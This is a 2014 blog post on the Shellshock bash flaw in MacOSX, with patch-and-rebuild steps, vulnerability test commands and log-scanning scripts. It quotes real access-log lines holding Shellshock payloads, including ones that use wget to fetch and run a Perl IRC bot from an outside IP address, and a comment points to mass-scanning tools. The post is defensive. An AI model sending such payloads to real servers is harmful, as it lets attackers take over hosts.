

September 27, 2014

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.

internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - -
hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - -
census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - -
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.
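To pick entries like the ones above out of a busy access log, the distinctive part is the exported-function header `() { :; };` (with or without the space before the closing brace) sitting in the Referer or User-Agent field. The following script is an added example, not code from the post: it reads Apache combined-format lines on stdin, flags any line carrying that marker, and sorts each hit into a rough category so the download-and-run payloads can be reviewed before the bare pings. The sample lines are constructed for the example and use TEST-NET addresses; `shellshock_hits`, `count_hits` and `download_clients` are names chosen here.

```shell
#!/bin/sh
# Added example (not from the post): flag Shellshock payloads in Apache
# combined-format access-log lines and sort each hit into a rough category.
# The sample lines are constructed; client addresses use TEST-NET ranges.

sample_log() {
cat <<'EOF'
203.0.113.10 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/x http://198.51.100.7/x;perl /var/tmp/x\"" "-"
203.0.113.11 - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 198.51.100.8" "() { :; }; /bin/ping -c 1 198.51.100.8" "-"
203.0.113.12 - - [26/Sep/2014:15:09:21 -0500] "GET /index.html HTTP/1.1" 200 431 "-" "() { :;}; echo -e 'detector'" "-"
198.51.100.20 - - [26/Sep/2014:15:10:00 -0500] "GET /index.html HTTP/1.1" 200 431 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0" "-"
EOF
}

# The marker every Shellshock payload carries: an exported-function header
# "() {" with a body such as ":;" before the closing brace. The pattern
# tolerates the spacing variants seen in the log excerpt ("() { :; }" and
# "() { :;}").
SHELLSHOCK_RE='\(\) *\{ *:;? *\}'

# Read log lines on stdin; print "client<TAB>category" for each line whose
# Referer or User-Agent carries the marker. Categories are a heuristic only:
#   download - payload fetches something (wget/curl); review these first
#   probe    - ping/echo/uname style reachability checks
#   other    - anything else that still carries the marker
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" | while IFS= read -r line; do
        client=${line%% *}
        case $line in
            *wget*|*curl*)         category=download ;;
            *ping*|*echo*|*uname*) category=probe ;;
            *)                     category=other ;;
        esac
        printf '%s\t%s\n' "$client" "$category"
    done
}

# Number of flagged lines on stdin.
count_hits() {
    shellshock_hits | wc -l | tr -d ' '
}

# Distinct clients that sent a "download" payload, one per line.
download_clients() {
    shellshock_hits | awk -F '\t' '$2 == "download" { print $1 }' | sort -u
}

# Usage: shellshock_hits < /var/log/apache2/access_log
# Run against the constructed sample when executed directly:
sample_log | shellshock_hits
```

Matching on the function header rather than on any particular command keeps the check independent of the payload (ping, wget, echo, uname), which is what varies from scanner to scanner in the excerpt; the category is only a triage aid, and a line in the `other` bucket still deserves a look.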

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

The following instructions (adapted from this blog post) are for MacOSX 10.9 (Mavericks). The idea is to download Apple’s source code for bash, patch it using the official bash patches, and recompile. If you are running an earlier version of MacOSX, you’ll have to download the appropriate package from Apple and use the corresponding patches for bash. Of course, you’ll need XCode, which is free from the App Store.

Fire up Terminal.app and do

mkdir bash
cd bash/
curl -O https://opensource.apple.com/tarballs/bash/bash-92.tar.gz
tar xzf bash-92.tar.gz
cd bash-92/bash-3.2/
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 | patch -p0
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-053 | patch -p0
curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-054 | patch -p0
cd ..
xcodebuild
sudo cp /bin/bash /bin/bash.vulnerable
sudo cp /bin/sh /bin/sh.vulnerable
sudo chmod 0000 /bin/*.vulnerable
sudo cp build/Release/bash build/Release/sh /bin/

Now you can try (in a new shell)

echo $BASH_VERSION

which should yield

3.2.54(1)-release

Similarly,

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

should yield

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

and

env X='() { (a)=>\' sh -c "echo date"; cat echo

should yield

sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
date
cat: echo: No such file or directory
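Rather than reading the two expected outputs by eye on every machine, the same pair of checks can be wrapped in a function that prints a single verdict. The script below is an added example, not part of the post: `check_shellshock` (a name chosen here) runs the post's `echo vulnerable` test and the `(a)=>\` test against a named shell binary and reports `patched`, `vulnerable` or `missing`. The second test is run in a scratch directory, because on an unpatched shell it leaves a file called `echo` behind, which is exactly what the `cat echo` in the post is looking for.

```shell
#!/bin/sh
# Added example (not from the post): run the post's two Shellshock checks
# against a named shell binary and print one word: "patched", "vulnerable"
# or "missing". Defaults to whatever "bash" is on $PATH.
check_shellshock() {
    shell=${1:-bash}
    command -v "$shell" >/dev/null 2>&1 || { echo missing; return 0; }

    # Check 1 (CVE-2014-6271): a patched shell must not execute the command
    # trailing an exported function definition, so "vulnerable" never appears.
    out=$(env x='() { :;}; echo vulnerable' "$shell" -c "echo this is a test" 2>/dev/null || true)
    case $out in
        *vulnerable*) echo vulnerable; return 0 ;;
    esac

    # Check 2 (CVE-2014-7169): the incomplete-patch parser bug turns
    # "echo date" into a redirection, leaving a file named "echo" in the
    # working directory. Run it in a scratch directory and look for that file.
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/shellshock.XXXXXX") || { echo unknown; return 1; }
    ( cd "$scratch" && env X='() { (a)=>\' "$shell" -c "echo date" >/dev/null 2>&1 ) || true
    if [ -e "$scratch/echo" ]; then
        rm -rf "$scratch"
        echo vulnerable
        return 0
    fi
    rm -rf "$scratch"
    echo patched
}

# Report on the two shells the instructions replace, plus any paths given as
# arguments (e.g. /bin/bash.vulnerable, the copy the instructions set aside).
for s in bash /bin/sh "$@"; do
    printf '%s: %s\n' "$s" "$(check_shellshock "$s")"
done
```

Pass the explicit path of the binary you just installed (`check_shellshock /bin/sh`) rather than relying on `$PATH`, and run it from a fresh Terminal window, since a shell started before the copy into /bin/ is still the old one.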

Approach these instructions with some caution.

  • You absolutely need a working version of /bin/sh for your system to function.
  • If you have a bunch of machines to update (as I did), you may be better off copying the new versions of bash and sh onto a thumb drive and using that to update your other machines.

Update (9/28/2014):

Apple has issued a statement to the effect that ordinary client systems are not remote-exploitable. At least as far as DHCP goes, that seems to be the case. The DHCP client functionality is implemented by the IPConfiguration agent, run by configd; no shellscripts are involved (unlike, say, under Linux). There are other subsystems to worry about (CUPS, SNMP, …), even on “client” systems. But I think I’ll give Apple the benefit of the doubt on that score.

Update (9/29/2014):

Apple has finally issued Bash patches for Mavericks, Mountain Lion and Lion. Oddly, these only bring Bash up to 3.2.53, rather than 3.2.54 (which is the latest, and hopefully final, iteration defanging the Shellshock attack).
Posted by distler at September 27, 2014 12:58 PM


2 Comments & 0 Trackbacks

Re: Shellshock and MacOSX

It’s incredible how many vulnerabilities made headlines this past year alone. On a related note, Comodo is doing some awesome things for the internet security space. A friend of mine who works there recently showed me one of their patented technologies which automatically sandboxes everything on the fly, and lets files which are clear of any malicious intent out. It’s called containment, you’ll probably like their approach.

Posted by: ThinkCode on February 19, 2015 7:32 PM

Re: Shellshock and MacOSX

If anyone is interested, there is a tool called “masscan” that lets you quickly scan a big range of IP ranges for vulnerabilities like this. And I guess you could also do it with nmap, but it’s not optimized to scan a large number of hosts efficiently (tip: disabling DNS resolution helps a lot for scanning speed).

Posted by: jesus on February 20, 2015 9:00 PM
